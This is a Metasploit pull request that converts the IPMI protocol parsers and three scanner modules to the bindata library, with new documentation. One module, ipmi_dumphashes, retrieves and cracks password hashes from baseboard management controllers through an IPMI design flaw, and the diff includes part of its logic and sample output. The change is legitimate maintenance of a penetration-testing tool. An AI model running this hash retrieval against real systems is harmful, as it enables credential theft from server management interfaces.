### PR TITLE
convert IPMI protocol and modules to bindata

### DIFF
--- a/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md
+++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md
@@ -1,0 +1,20 @@
+The ipmi_cipher_zero module is used to find IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of IPMI cipher zero, which means no cipher is used at all.
+
+## Vulnerable Devices
+
+This is an error in the IPMI 2.0 specification itself, so any device BMC fully implementing IPMI 2.0 will possibly have the vulnerable non-cipher enabled.
+
+## Verification Steps
+
+Set RHOSTS to the target device or range and run:
+
+```
+msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
+msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.2
+RHOSTS => 192.168.1.2
+msf auxiliary(ipmi_cipher_zero) > run
+
+[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
+[*] 192.168.1.2:623 - IPMI - NOT VULNERABLE: Rejected cipher zero with error code 17
+
+```

--- a/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md
+++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md
@@ -1,0 +1,34 @@
+The ipmi_dumphashes module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
+
+## Vulnerable Devices
+
+Any IPMI 2.0 device implementing the RAKP protocol according to the IPMI specification is vulnerable. This is a design flaw rather than a vendor-specific vulnerability.
+
+## Verification Steps
+
+Set RHOSTS to the target device or range and run:
+
+```
+msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
+msf auxiliary(ipmi_dumphashes) > set RHOSTS 192.168.1.2
+RHOSTS => 192.168.1.2
+msf auxiliary(ipmi_dumphashes) > run
+
+[*] 192.168.1.2:623 - IPMI - Sending IPMI probes
+[*] 192.168.1.2:623 - IPMI - Trying username 'ADMIN'...
+[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name
+[*] 192.168.1.2:623 - IPMI - Trying username 'admin'...
+[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username admin: Unauthorized name
+[*] 192.168.1.2:623 - IPMI - Trying username 'root'...
+[+] 192.168.1.2:623 - IPMI - Hash found: root:redacted
+[*] 192.168.1.2:623 - IPMI - Trying username 'Administrator'...
+[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username Administrator: Unauthorized name
+[*] 192.168.1.2:623 - IPMI - Trying username 'USERID'...
+[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name
+[*] 192.168.1.2:623 - IPMI - Trying username 'guest'...
+[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username guest: Unauthorized name
+[*] 192.168.1.2:623 - IPMI - Trying username ''...
+[+] 192.168.1.2:623 - IPMI - Hash found: redacted
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md
+++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md
@@ -1,0 +1,21 @@
+The ipmi_version module is used to identify the version of the IPMI specification implemented by devices on a network.
+
+## Target Devices
+
+Any exposed device that implements the IPMI specification should work with this module. This is a recon module rather than an exploitation module.
+
+## Verification Steps
+
+Set RHOSTS to the target device or range and run:
+
+```
+msf > use auxiliary/scanner/ipmi/ipmi_version
+msf auxiliary(ipmi_version) > set RHOSTS 192.168.1.2
+RHOSTS => 192.168.1.2
+msf auxiliary(ipmi_version) > run
+
+[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
+[*] 192.168.1.2:623 - IPMI - Probe sent
+[+] 192.168.1.2:623 - IPMI - IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
+
+```

--- a/lib/rex/proto/ipmi.rb
+++ b/lib/rex/proto/ipmi.rb
@@ -5,7 +5,6 @@ require 'rex/proto/ipmi/utils'
 module Rex
 module Proto
 module IPMI
-  require 'bit-struct'
   require 'rex/proto/ipmi/channel_auth_reply'
   require 'rex/proto/ipmi/open_session_reply'
   require 'rex/proto/ipmi/rakp2'

--- a/lib/rex/proto/ipmi/channel_auth_reply.rb
+++ b/lib/rex/proto/ipmi/channel_auth_reply.rb
@@ -1,56 +1,57 @@
 # -*- coding: binary -*-
 
+require 'bindata'
+
 module Rex
 module Proto
 module IPMI
 
-class Channel_Auth_Reply < BitStruct
-  unsigned :rmcp_version,                    8,     "RMCP Version"
-  unsigned :rmcp_padding,                    8,     "RMCP Padding"
-  unsigned :rmcp_sequence,                   8,     "RMCP Sequence"
-  unsigned :rmcp_mtype,                      1,     "RMCP Message Type"
-  unsigned :rmcp_class,                      7,     "RMCP Message Class"
+class Channel_Auth_Reply < BinData::Record
+  endian :little
+  uint8  :rmcp_version            ,label: "RMCP Version"
+  uint8  :rmcp_padding            ,label: "RMCP Padding"
+  uint8  :rmcp_sequence           ,label: "RMCP Sequence"
+  bit1   :rmcp_mtype              ,label: "RMCP Message Type"
+  bit7   :rmcp_class              ,label: "RMCP Message Class"
 
-  unsigned :session_auth_type,               8,     "Session Auth Type"
-  unsigned :session_sequence,               32,     "Session Sequence Number"
-  unsigned :session_id,                     32,     "Session ID"
-  unsigned :message_length,                  8,     "Message Length"
+  uint8  :session_auth_type       ,label: "Session Auth Type"
+  uint32 :session_sequence        ,label: "Session Sequence Number"
+  uint32 :session_id              ,label: "Session ID"
+  uint8  :message_length          ,label: "Message Length"
 
-  unsigned :ipmi_tgt_address,                8,     "IPMI Target Address"
-  unsigned :ipmi_tgt_lun,                    8,     "IPMI Target LUN"
-  unsigned :ipmi_header_checksum,            8,     "IPMI Header Checksum"
-  unsigned :ipmi_src_address,                8,     "IPMI Source Address"
-  unsigned :ipmi_src_lun,                    8,     "IPMI Source LUN"
-  unsigned :ipmi_command,                    8,     "IPMI Command"
-  unsigned :ipmi_completion_code,            8,     "IPMI Completion Code"
+  uint8  :ipmi_tgt_address        ,label: "IPMI Target Address"
+  uint8  :ipmi_tgt_lun            ,label: "IPMI Target LUN"
+  uint8  :ipmi_header_checksum    ,label: "IPMI Header Checksum"
+  uint8  :ipmi_src_address        ,label: "IPMI Source Address"
+  uint8  :ipmi_src_luna           ,label: "IPMI Source LUN"
+  uint8  :ipmi_command            ,label: "IPMI Command"
+  uint8  :ipmi_completion_code    ,label: "IPMI Completion Code"
 
-  unsigned :ipmi_channel,                    8,     "IPMI Channel"
+  uint8  :ipmi_channel            ,label: "IPMI Channel"
 
-  unsigned :ipmi_compat_20,                  1,     "IPMI Version Compatibility: IPMI 2.0+"
-  unsigned :ipmi_compat_reserved1,           1,     "IPMI Version Compatibility: Reserved 1"
-  unsigned :ipmi_compat_oem_auth,            1,     "IPMI Version Compatibility: OEM Authentication"
-  unsigned :ipmi_compat_password,            1,     "IPMI Version Compatibility: Straight Password"
-  unsigned :ipmi_compat_reserved2,           1,     "IPMI Version Compatibility: Reserved 2"
-  unsigned :ipmi_compat_md5,                 1,     "IPMI Version Compatibility: MD5"
-  unsigned :ipmi_compat_md2,                 1,     "IPMI Version Compatibility: MD2"
-  unsigned :ipmi_compat_none,                1,     "IPMI Version Compatibility: None"
+  bit1   :ipmi_compat_20          ,label: "IPMI Version Compatibility: IPMI 2.0+"
+  bit1   :ipmi_compat_reserved1   ,label: "IPMI Version Compatibility: Reserved 1"
+  bit1   :ipmi_compat_oem_auth    ,label: "IPMI Version Compatibility: OEM Authentication"
+  bit1   :ipmi_compat_password    ,label: "IPMI Version Compatibility: Straight Password"
+  bit1   :ipmi_compat_reserved2   ,label: "IPMI Version Compatibility: Reserved 2"
+  bit1   :ipmi_compat_md5         ,label: "IPMI Version Compatibility: MD5"
+  bit1   :ipmi_compat_md2         ,label: "IPMI Version Compatibility: MD2"
+  bit1   :ipmi_compat_none        ,label: "IPMI Version Compatibility: None"
 
-  unsigned :ipmi_user_reserved1,             2,     "IPMI User Compatibility: Reserved 1"
-  unsigned :ipmi_user_kg,                    1,     "IPMI User Compatibility: KG Set to Default"
-  unsigned :ipmi_user_disable_message_auth,  1,     "IPMI User Compatibility: Disable Per-Message Authentication"
-  unsigned :ipmi_user_disable_user_auth,     1,     "IPMI User Compatibility: Disable User-Level Authentication"
-  unsigned :ipmi_user_non_null,              1,     "IPMI User Compatibility: Non-Null Usernames Enabled"
-  unsigned :ipmi_user_null,                  1,     "IPMI User Compatibility: Null Usernames Enabled"
-  unsigned :ipmi_user_anonymous,             1,     "IPMI User Compatibility: Anonymous Login Enabled"
+  bit2   :ipmi_user_reserved1     ,label: "IPMI User Compatibility: Reserved 1"
+  bit1   :ipmi_user_kg            ,label: "IPMI User Compatibility: KG Set to Default"
+  bit1   :ipmi_user_disable_message_auth ,label: "IPMI User Compatibility: Disable Per-Message Authentication"
+  bit1   :ipmi_user_disable_user_auth ,label: "IPMI User Compatibility: Disable User-Level Authentication"
+  bit1   :ipmi_user_non_null      ,label: "IPMI User Compatibility: Non-Null Usernames Enabled"
+  bit1   :ipmi_user_null          ,label: "IPMI User Compatibility: Null Usernames Enabled"
+  bit1   :ipmi_user_anonymous     ,label: "IPMI User Compatibility: Anonymous Login Enabled"
 
-  unsigned :ipmi_conn_reserved1,             6,     "IPMI Connection Compatibility: Reserved 1"
-  unsigned :ipmi_conn_20,                    1,     "IPMI Connection Compatibility: 2.0"
-  unsigned :ipmi_conn_15,                    1,     "IPMI Connection Compatibility: 1.5"
+  bit6   :ipmi_conn_reserved1     ,label: "IPMI Connection Compatibility: Reserved 1"
+  bit1   :ipmi_conn_20            ,label: "IPMI Connection Compatibility: 2.0"
+  bit1   :ipmi_conn_15            ,label: "IPMI Connection Compatibility: 1.5"
+  bit24  :ipmi_oem_id             ,label: "IPMI OEM ID"
 
-  unsigned :ipmi_oem_id,                    24,     "IPMI OEM ID", :endian => 'little'
-
-  rest :ipm_oem_data, "IPMI OEM Data + Checksum Byte"
-
+  rest :ipm_oem_data              ,label: "IPMI OEM Data + Checksum Byte"
 
   def to_banner
     info   = self

--- a/lib/rex/proto/ipmi/open_session_reply.rb
+++ b/lib/rex/proto/ipmi/open_session_reply.rb
@@ -1,36 +1,39 @@
 # -*- coding: binary -*-
 
+require 'bindata'
+
 module Rex
-module Proto
-module IPMI
+  module Proto
+    module IPMI
+      class Open_Session_Reply < BinData::Record
+        endian  :little
+        uint8   :rmcp_version                     ,label: "RMCP Version"
+        uint8   :rmcp_padding                     ,label: "RMCP Padding"
+        uint8   :rmcp_sequence                    ,label: "RMCP Sequence"
+        bit1    :rmcp_mtype                       ,label: "RMCP Message Type"
+        bit7    :rmcp_class                       ,label: "RMCP Message Class"
 
-class Open_Session_Reply < BitStruct
-  unsigned :rmcp_version,  8,  "RMCP Version"
-  unsigned :rmcp_padding,  8,  "RMCP Padding"
-  unsigned :rmcp_sequence, 8,  "RMCP Sequence"
-  unsigned :rmcp_mtype,    1,  "RMCP Message Type"
-  unsigned :rmcp_class,    7,  "RMCP Message Class"
+        uint8   :session_auth_type                ,label: "Authentication Type"
 
-  unsigned :session_auth_type, 8,  "Authentication Type"
+        bit1    :session_payload_encrypted        ,label: "Session Payload Encr"
+        bit1    :session_payload_authenticated    ,label: "Session Payload Auth"
+        bit6    :session_payload_type             ,label: "Session Payload Type"
 
-  unsigned :session_payload_encrypted,     1,  "Session Payload Encrypted"
-  unsigned :session_payload_authenticated, 1,  "Session Payload Authenticated"
-  unsigned :session_payload_type,          6,  "Session Payload Type", :endian => 'little'
+        uint32   :session_id                      ,label: "Session ID"
+        uint32   :session_sequence                ,label: "Session Sequence Number"
+        uint16   :message_length                  ,label: "Message Length"
 
-  unsigned :session_id,       32,  "Session ID"
-  unsigned :session_sequence, 32,  "Session Sequence Number"
-  unsigned :message_length,   16,  "Message Length", :endian => "little"
+        uint8    :ignored1                        ,label: "Ignored"
+        uint8    :error_code                      ,label: "RMCP Error Code"
+        uint16   :ignored2                        ,label: "Ignored"
+        rest     :data                            ,label: "Session Info"
+      end
 
-  unsigned :ignored1,        8, "Ignored"
-  unsigned :error_code,      8, "RMCP Error Code"
-  unsigned :ignored2,       16, "Ignored"
-  char :console_session_id, 32, "Console Session ID"
-  char :bmc_session_id,     32, "BMC Session ID"
-
-  rest :stuff, "The Rest of the Stuff"
+      class Session_Data < BinData::Record
+        endian   :little
+        string   :console_session_id, length: 4   ,label: "Console Session ID"
+        string   :bmc_session_id, length: 4       ,label: "BMC Session ID"
+      end
+    end
+  end
 end
-
-end
-end
-end
-

--- a/lib/rex/proto/ipmi/rakp2.rb
+++ b/lib/rex/proto/ipmi/rakp2.rb
@@ -1,36 +1,40 @@
 # -*- coding: binary -*-
 
+require 'bindata'
+
 module Rex
-module Proto
-module IPMI
+  module Proto
+    module IPMI
+      class RAKP2 < BinData::Record
+        endian  :little
+        uint8   :rmcp_version                   ,label: "RMCP Version"
+        uint8   :rmcp_padding                   ,label: "RMCP Padding"
+        uint8   :rmcp_sequence                  ,label: "RMCP Sequence"
+        bit1    :rmcp_mtype                     ,label: "RMCP Message Type"
+        bit7    :rmcp_class                     ,label: "RMCP Message Class"
 
-class RAKP2 < BitStruct
-  unsigned :rmcp_version,      8,     "RMCP Version"
-  unsigned :rmcp_padding,      8,     "RMCP Padding"
-  unsigned :rmcp_sequence,     8,     "RMCP Sequence"
-  unsigned :rmcp_mtype,    1,     "RMCP Message Type"
-  unsigned :rmcp_class,    7,     "RMCP Message Class"
+        uint8   :session_auth_type              ,label: "Authentication Type"
 
-  unsigned :session_auth_type,  8,     "Authentication Type"
+        bit1    :session_payload_encrypted      ,label: "Session Payload Encrypted"
+        bit1    :session_payload_authenticated  ,label: "Session Payload Authenticated"
+        bit6    :session_payload_type           ,label: "Session Payload Type"
 
-  unsigned :session_payload_encrypted,  1,     "Session Payload Encrypted"
-  unsigned :session_payload_authenticated,  1,     "Session Payload Authenticated"
-  unsigned :session_payload_type,  6,     "Session Payload Type", :endian => 'little'
+        uint32  :session_id                     ,label: "Session ID"
+        uint32  :session_sequence               ,label: "Session Sequence Number"
+        uint16  :message_length                 ,label: "Message Length"
+        uint8   :ignored1                       ,label: "Ignored"
+        uint8   :error_code                     ,label: "RMCP Error Code"
+        uint16  :ignored2                       ,label: "Ignored"
+        rest    :data                           ,label: "RAKP2 Data"
+      end
 
-  unsigned :session_id,  32,     "Session ID"
-  unsigned :session_sequence,  32,     "Session Sequence Number"
-  unsigned :message_length,  16,     "Message Length", :endian => "little"
-
-  unsigned :ignored1, 8, "Ignored"
-  unsigned :error_code, 8, "RMCP Error Code"
-  unsigned :ignored2, 16, "Ignored"
-  char :console_session_id, 32, "Console Session ID"
-  char :bmc_random_id,  128,     "BMC Random ID"
-  char :bmc_guid,  128,     "RAKP2 Hash 2 (nulls)"
-  char :hmac_sha1,  160,     "HMAC_SHA1 Output"
-  rest :stuff, "The rest of the stuff"
-end
-
-end
-end
+      class RAKP2_Data < BinData::Record
+        endian  :little
+        string  :console_session_id, length: 4  ,label: "Console Session ID"
+        string  :bmc_random_id, length: 16      ,label: "BMC Random ID"
+        string  :bmc_guid, length: 16           ,label: "RAKP2 Hash 2 (nulls)"
+        string  :hmac_sha1, length: 20          ,label: "HMAC_SHA1 Output"
+      end
+    end
+  end
 end

--- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'        => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
       'Description' => %q|
-        This module identifies IPMI 2.0 compatible systems that are vulnerable
+        This module identifies IPMI 2.0-compatible systems that are vulnerable
         to an authentication bypass vulnerability through the use of cipher
         zero.
         |,

--- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
@@ -54,9 +54,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def scanner_process(data, shost, sport)
-    info = Rex::Proto::IPMI::Open_Session_Reply.new(data) rescue nil
-    return if not info
-    return if not info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP
+    info = Rex::Proto::IPMI::Open_Session_Reply.new.read(data)#  rescue nil
+    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP
 
     # Ignore duplicate replies
     return if @res[shost]

--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retreival',
+      'Name'        => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
       'Description' => %q|
         This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
         HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
@@ -50,9 +50,21 @@ class MetasploitModule < Msf::Auxiliary
 
   end
 
+  def ipmi_status(msg)
+    vprint_status("#{rhost}:#{rport} - IPMI - #{msg}")
+  end
+
+  def ipmi_error(msg)
+    vprint_error("#{rhost}:#{rport} - IPMI - #{msg}")
+  end
+
+  def ipmi_good(msg)
+    vprint_good("#{rhost}:#{rport} - IPMI - #{msg}")
+  end
+
   def run_host(ip)
 
-    vprint_status("#{ip}:#{rport} - IPMI - Sending IPMI probes")
+    ipmi_status("Sending IPMI probes")
 
     usernames = []
     passwords = []
@@ -84,10 +96,11 @@ class MetasploitModule < Msf::Auxiliary
       console_session_id = Rex::Text.rand_text(4)
       console_random_id  = Rex::Text.rand_text(16)
 
-      vprint_status("#{rhost}:#{rport} - IPMI - Trying username '#{username}'...")
+      ipmi_status("Trying username '#{username}'...")
 
       rakp = nil
       sess = nil
+      sess_data = nil
 
       # It may take multiple tries to get a working "session" on certain BMCs (HP iLO 4, etc)
       1.upto(5) do |attempt|
@@ -100,53 +113,67 @@ class MetasploitModule < Msf::Auxiliary
         end
 
         unless r
-          vprint_status("#{rhost}:#{rport} - IPMI - No response to IPMI open session request")
+          ipmi_status("No response to IPMI open session request")
           rakp = nil
           break
         end
 
         sess = process_opensession_reply(*r)
         unless sess
-          vprint_status("#{rhost}:#{rport} - IPMI - Could not understand the response to the open session request")
+          ipmi_status("Could not understand the response to the open session request")
           rakp = nil
           break
         end
 
+        if sess.data.length < 8
+          ipmi_status("Refused IPMI open session request")
+          rakp = nil
+          break
+        end
+
+        sess_data = Rex::Proto::IPMI::Session_Data.new.read(sess.data)
+
         r = nil
         1.upto(3) do
-          udp_send(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess.bmc_session_id, console_random_id, username))
+          udp_send(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess_data.bmc_session_id, console_random_id, username))
           r = udp_recv(5.0)
           break if r
         end
 
         unless r
-          vprint_status("#{rhost}:#{rport} - IPMI - No response to RAKP1 message")
+          ipmi_status("No response to RAKP1 message")
           next
         end
 
         rakp = process_rakp1_reply(*r)
         unless rakp
-          vprint_status("#{rhost}:#{rport} - IPMI - Could not understand the response to the RAKP1 request")
+          ipmi_status("Could not understand the response to the RAKP1 request")
           rakp = nil
           break
         end
 
         # Sleep and retry on session ID errors
         if rakp.error_code == 2
-          vprint_error("#{rhost}:#{rport} - IPMI - Returned a Session ID error for username #{username} on attempt #{attempt}")
+          ipmi_error("Returned a Session ID error for username #{username} on attempt #{attempt}")
           Rex.sleep(1)
           next
         end
 
         if rakp.error_code != 0
-          vprint_error("#{rhost}:#{rport} - IPMI - Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
+          ipmi_error("Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
           rakp = nil
           break
         end
 
         # TODO: Finish documenting this error field
         if rakp.ignored1 != 0
-          vprint_error("#{rhost}:#{rport} - IPMI - Returned error code #{rakp.ignored1} for username #{username}")
+          ipmi_error("Returned error code #{rakp.ignored1} for username #{username}")
+          rakp = nil
+          break
+        end
+
+        # Check if there is hash data
+        if rakp.data.length < 56
           rakp = nil
           break
         end
@@ -156,29 +183,29 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       # Skip to the next user if we didnt get a valid response
-      next if not rakp
+      next if !rakp
 
       # Calculate the salt used in the hmac-sha1 hash
+      rakp_data = Rex::Proto::IPMI::RAKP2_Data.new.read(rakp.data)
       hmac_buffer = Rex::Proto::IPMI::Utils.create_rakp_hmac_sha1_salt(
         console_session_id,
-        sess.bmc_session_id,
+        sess_data.bmc_session_id,
         console_random_id,
-        rakp.bmc_random_id,
-        rakp.bmc_guid,
+        rakp_data.bmc_random_id,
+        rakp_data.bmc_guid,
         0x14,
         username
       )
 
       sha1_salt = hmac_buffer.unpack("H*")[0]
-      sha1_hash = rakp.hmac_sha1.unpack("H*")[0]
+      sha1_hash = rakp_data.hmac_sha1.unpack("H*")[0]
 
       if sha1_hash == "0000000000000000000000000000000000000000"
-        vprint_error("#{rhost}:#{rport} - IPMI - Returned a bogus SHA1 hash for username #{username}")
+        ipmi_error("Returned a bogus SHA1 hash for username #{username}")
         next
       end
 
-      found = "#{rhost}:#{rport} - IPMI - Hash found: #{username}:#{sha1_salt}:#{sha1_hash}"
-      print_good(found)
+      ipmi_good("Hash found: #{username}:#{sha1_salt}:#{sha1_hash}")
 
       write_output_files(rhost, username, sha1_salt, sha1_hash)
 
@@ -205,8 +232,8 @@ class MetasploitModule < Msf::Auxiliary
       passwords.uniq.each do |pass|
         pass = pass.strip
         next unless pass.length > 0
-        next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp.hmac_sha1, pass)
-        print_good("#{rhost}:#{rport} - IPMI - Hash for user '#{username}' matches password '#{pass}'")
+        next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp_data.hmac_sha1, pass)
+        ipmi_good("Hash for user '#{username}' matches password '#{pass}'")
 
         # Report the clear-text credential to the database
         report_cracked_cred(username, pass, core_id)
@@ -217,17 +244,15 @@ class MetasploitModule < Msf::Auxiliary
 
   def process_opensession_reply(data, shost, sport)
     shost = shost.sub(/^::ffff:/, '')
-    info = Rex::Proto::IPMI::Open_Session_Reply.new(data) rescue nil
-    return if not info
-    return if not info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP
+    info = Rex::Proto::IPMI::Open_Session_Reply.new.read(data) rescue nil
+    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP
     info
   end
 
   def process_rakp1_reply(data, shost, sport)
     shost = shost.sub(/^::ffff:/, '')
-    info = Rex::Proto::IPMI::RAKP2.new(data) rescue nil
-    return if not info
-    return if not info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2
+    info = Rex::Proto::IPMI::RAKP2.new.read(data) rescue nil
+    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2
     info
   end
 

--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'        => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
       'Description' => %q|
-        This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
+        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the
         HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
         file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
         in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.

--- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def scanner_process(data, shost, sport)
-    info = Rex::Proto::IPMI::Channel_Auth_Reply.new(data) rescue nil
+    info = Rex::Proto::IPMI::Channel_Auth_Reply.new.read(data) rescue nil
 
     # Ignore invalid responses
     return unless info


### PR DESCRIPTION
Because bit-struct is not Ruby 2.4+ compatible and appears to be unmaintained now, this converts our IPMI modules to use bindata instead. To test this properly, it is ideal to have an actual IPMI target handy.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/ipmi/ipmi_cipher_zero`
- [x] `setg RHOSTS IP`
- [x] **Verify** that you can check if the remote host is vulnerable
- [x] `use auxiliaryscanner/ipmi/ipmi_dumphashes`
- [x] **Verify** that you can dump hashes
- [x] `use auxiliaryscanner/ipmi/ipmi_version`
- [x] **Verify** that you can identify IPMI versions

```
msf auxiliary(ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
[*] 192.168.1.2:623 - IPMI - NOT VULNERABLE: Rejected cipher zero with error code 17


^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > run

[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
[*] 192.168.1.2:623 - IPMI - Probe sent
[+] 192.168.1.2:623 - IPMI - IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)

^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > run

[*] 192.168.1.2:623 - IPMI - Sending IPMI probes
[*] 192.168.1.2:623 - IPMI - Trying username 'ADMIN'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'admin'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username admin: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'root'...
[+] 192.168.1.2:623 - IPMI - Hash found: root:redacted
[*] 192.168.1.2:623 - IPMI - Trying username 'Administrator'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username Administrator: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'USERID'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username 'guest'...
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username guest: Unauthorized name
[*] 192.168.1.2:623 - IPMI - Trying username ''...
[+] 192.168.1.2:623 - IPMI - Hash found: redacted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```